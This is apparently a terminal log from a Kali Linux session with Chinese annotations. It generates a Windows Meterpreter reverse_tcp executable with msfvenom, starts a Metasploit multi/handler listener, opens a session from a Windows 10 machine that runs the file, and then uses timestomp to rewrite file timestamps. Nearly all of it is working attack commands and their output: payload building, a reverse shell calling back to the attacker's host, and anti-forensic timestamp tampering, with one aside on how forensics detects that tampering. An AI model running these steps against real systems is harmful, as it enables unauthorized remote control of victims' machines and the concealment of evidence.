root@kali:~# msfvenom -p windows/meterpreter/reverse_tcp lhost= lport=1234 --format=exe > /root/attack.exe

No platform was selected, choosing Msf::Module::Platform::Windows from the payload

No Arch selected, selecting Arch: x86 from the payload

No encoder or badchars specified, outputting raw payload

Payload size: 333 bytes

Final size of exe file: 73802 bytes

Saved as: /root/attack.exe            (病毒)

root@kali:~# service postgresql start

root@kali:~# msfconsole

root@kali:~# db_status

msf > use exploit/multi/handler

msf exploit(handler) > set payload windows/meterpreter/reverse_tcp

msf exploit(handler) > set lhost 192.168.1.117                            (kali linux主机)

msf exploit(handler) > set lport 1234

msf exploit(handler) > show options

msf exploit(handler) > exploit -h

msf exploit(handler) > exploit -j z

[*] Exploit running as background job.


[*] Started reverse TCP handler on 192.168.1.117:1234

msf exploit(handler) > [*] Starting the payload handler...



msf exploit(handler) > [*] Starting the payload handler...

[*] Sending stage (957999 bytes) to 192.168.1.94

[*] Meterpreter session 1 opened( -> at 2017-03-10 00:16:54 -0500    (windows主机运行attack.exe后产生session 1)

msf exploit(handler) > sessions -i


Active sessions



 Id  Type                   Information              Connection

 --  ----                   -----------              ----------

 1   meterpreter x86/win32  sh-270\sewells @ SH-270 ->

msf exploit(handler) > sessions -i 1               (1是session Id号码)

meterpreter > pwd                        (成功登陆)


meterpreter > sysinfo

Computer       : SH-270

OS              : Windows 10 (Build 14393).

Architecture    : x64 (Current Process is WOW64)

System Language : zh_CN

Domain          : WORKGROUP

Logged On Users : 1

Meterpreter     : x86/win32

meterpreter > getuid

Server username: sh-270\sewells

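meterpreter > timestomp -h            修改***时间 (timestomp rewrites the NTFS $STANDARD_INFORMATION timestamps; comparing them with the $FILE_NAME timestamps in the MFT is how forensic analysis detects this kind of tampering)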

meterpreter > timestomp attack.exe -v

Modified      : 2017-03-10 00:01:11 -0500

Accessed      : 2017-03-10 00:03:26 -0500

Created       : 2017-03-10 00:18:07 -0500

Entry Modified: 2017-03-10 00:18:07 -0500